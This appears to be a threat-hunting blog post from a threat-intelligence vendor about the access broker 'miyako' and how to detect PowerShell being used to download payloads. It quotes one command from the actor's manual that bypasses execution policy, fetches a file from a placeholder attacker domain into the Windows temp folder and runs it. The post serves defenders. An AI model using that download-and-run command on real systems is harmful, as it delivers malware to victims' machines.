Initial access brokers (IABs) are underground threat actors who sell access to compromised networks or systems. Because obtaining access can be time-consuming, this has emerged as its own cybercriminal product category and is sometimes referred to as “access-as-a-service.” Access could mean stolen login credentials or knowledge of a software exploit or misconfiguration. Threat actors sometimes post screenshots of say, domain controllers, to prove the access. Buying the access essentially saves other malicious hackers time and allows them to move on to downstream actions, such as stealing data, deploying malware or conducting extortion attacks using ransomware.
One prolific IAB goes by the nicknames miyako, miya and Mommy, among others. The actor gained attention in 2024 due to miyako’s advanced tactics, techniques and procedures (TTPs) and involvement in high-profile attacks. The actor claims to work alone, focusing on data exfiltration and exploiting high-value targets, particularly government entities, telecommunications companies and critical infrastructure providers. The person was an active and notorious member of the BreachForums cybercrime forum (see our blog “BreachForums Saga Continues: What’s Next?”) and conducted several significant attacks as a member of the HellCat hacking group.
In January 2025, miyako created an intrusion manual that used real scenarios to explain how the actor compromised multiple entities. The guide was offered for sale on BreachForums, but a copy of it was uploaded to VirusTotal. The guide allows aspiring access brokers and cybercriminals to replicate miyako’s methods and gives them tutorials along with tools and commands to accomplish the same attacks. It outlines detailed methodologies for conducting intrusions, maintaining persistence, setting up command-and-control (C2) servers, expanding initial footholds and monetizing compromised access and data. This includes how to leverage publicly available proof-of-concept (PoC) exploit code for known common vulnerabilities and exposures (CVEs) and scanning internet-exposed systems using search tools like Shodan, FOFA and Leakix. It covers exploitation of several vulnerabilities in network edge enterprise products, such as firewalls. It also provides suggestions of how to market and sell the access to systems and data, such as: “If someone keeps asking for proof of multiple accesses and then never buys over and over, stop providing proof. Don't tell someone how you got in, they will go try and do it themself.”
In this threat hunting case study, we will demonstrate a technique used by miyako as well as other threat groups to download malicious payloads using Microsoft’s PowerShell scripting language.
The most effective threat hunts focus on detecting the TTPs attackers consistently use. Indicators of compromise (IoCs), such as IP addresses and malware hashes, should be scanned for as part of due diligence, but the absence of such indicators doesn’t mean a system is clean. Attackers are often creatures of habit, relying on the same behaviors and workflows in their intrusions, and hunting for these behaviors can be more reliable signs of a possible intrusion. TTPs are at the top of the Pyramid of Pain, which is the model of indicators that illustrates the relative difficulty threat actors have in changing them.
Threat actors often favor using native Windows binaries once they’ve breached a system. These tools — referred to as living-off-the-land binaries (LOLBins) — may already be on the compromised systems so their use is less likely to raise security alarms. Common Windows LOLBins include certutil, mshta, bitsadmin, PowerShell and regsvr32. Use of the tools in and of themselves may not be sole reliable indicators, but how those tools are used may provide clues leading to evidence of compromise. The actor miyako, for example, previously abused PowerShell to download a malicious payload from an external domain. If we perform a threat hunt, we may be able to uncover artifacts showing this.
We’re going to select a specific hunt package from HUNTER, Intel 471’s threat hunting platform, called Methods for Downloading Files with PowerShell. The package is available in HUNTER’s Community Platform upon registration. HUNTER contains prewritten hunt queries for this hunt for various for endpoint, detection and response (EDR) and security incident and event management (SIEM) systems: CarbonBlack Cloud - Investigate, CarbonBlack Response, Crowdstrike LogScale, Elastic, Google SecOps, Microsoft Defender, Microsoft Sentinel, Palo Alto Cortex XDR, QRadar Query, SentinelOne, SentinelOne Singularity, Splunk, Tanium, Tanium Signal and Trend Micro Vision One.
This package is intended to identify instances where PowerShell is being used to download files from external sources, which is a common technique used in malware delivery and lateral movement. The hunt examines various methods by which PowerShell can be leveraged for file downloads, including the use of cmdlets such as Invoke-WebRequest (iwr), Invoke-RestMethod (irm) and Start-BitsTransfer (sbt), as well as direct use of .NET classes like System.Net.WebClient and HttpClient. The package also checks for potentially suspicious use of aliases (curl, wget) and other common executables that invoke PowerShell scripts to download malicious payloads.
Let’s look at the query logic (see: image below). This contains the key-value or field-value relationships that we will be hunting. The logic includes any command line or executable paths that invoke values related to PowerShell or are associated with remote downloads.
It should be noted that these processes can be invoked by legitimate users. To disambiguate whether a download action is legitimate or not, we can examine any external domains or IP addresses contacted. Further investigation may determine the activity came from an administrator downloading a legitimate tool. Or maybe not.
In miyako’s malicious hacking guide, we can examine the syntax the actor used to execute a command without invoking an executable file and dropping a payload on the machine:
powershell -ep bypass -Command "Invoke-WebRequest -Uri 'http://{{ATTACKER_DOMAIN}}/maliciouspayload' -OutFile
'C:\Windows\Temp\{{PAYLOAD_NAME}}.exe'; Start-Process 'C:\Windows\Temp\{{PAYLOAD_NAME}}.exe'"
In the command, we can see “Invoke-WebRequest” along with the domain where the attacker has hosted the malicious payload. We can also see the destination for the payload, which is Windows’ temporary directory, a somewhat obscure place that attackers are hoping administrators will not be watching. It’s an easy place to hide until the attackers can take steps to establish more persistent access, such as creating a Scheduled Task.
The last part of the command starts the process linked to the payload. This query casts a wide net. Many other threat actors use this command, including several ransomware groups such as Fog, Interlock, Black Basta, Ghost, Amadey and SafePay. Let’s run a query using Windows System Monitor (Sysmon) logs in Splunk:
The result shows the launch of a PowerShell process and parent process. That’s not enough evidence of a compromise just yet, but we can aggregate the data to collect more artifacts to hunt. The results show this behavior was first seen and last seen on this specific host and only run once. The process was powershell.exe and the parent process was PowerShell. Then we can see the command-line arguments, and this is where the hunt becomes very interesting.
The result shows the PowerShell command reached out to a Google domain for a portable network graphic (.png) file. From here, the investigation can be taken in different directions, such as checking network and domain name system (DNS) logs to see if the domain was contacted. Another direction would be to check file-create logs in Windows Event Logs to see if this file actually landed in the directory shown in the script.
Thanks for joining us for another threat hunt. A video demonstrating this hunt technique can be found here. Be sure to register for a free HUNTER Community Edition account to view other free threat hunt content and our extensive library of threat hunt packages based on our Malware Intelligence and Adversary Intelligence. HUNTER also contains a purpose-built centralized hunt management tool, the HUNT Management Module, for tracking and measuring key hunt performance metrics, coordinating collaborative hunts, managing hunt queries and reporting. For more information, contact Intel 471.
In July 2025 threat actors exploited zero-day vulnerabilities in on-premises Microsoft SharePoint servers in an incident known as ToolShell. In this case study, we conduct a threat hunt for ToolShell-related activity.
Guided Threat Hunts offers a library of Pivot Queries for hundreds of hunt packages that enable your threat hunters and analysts to overcome uncertainty and boost productivity. Guided Threat Hunts is a set of packages that assists users modify their result set to decide their next step and filter out noise from extraneous results.
The Lumma infostealer malware collects highly sensitive data including logins and session tokens. Here's how to conduct a threat hunt leveraging up-to-date tactics, techniques and procedures used by Lumma.
Stay informed with our weekly executive update, sending you the latest news and timely data on the threats, risks, and regulations affecting your organization.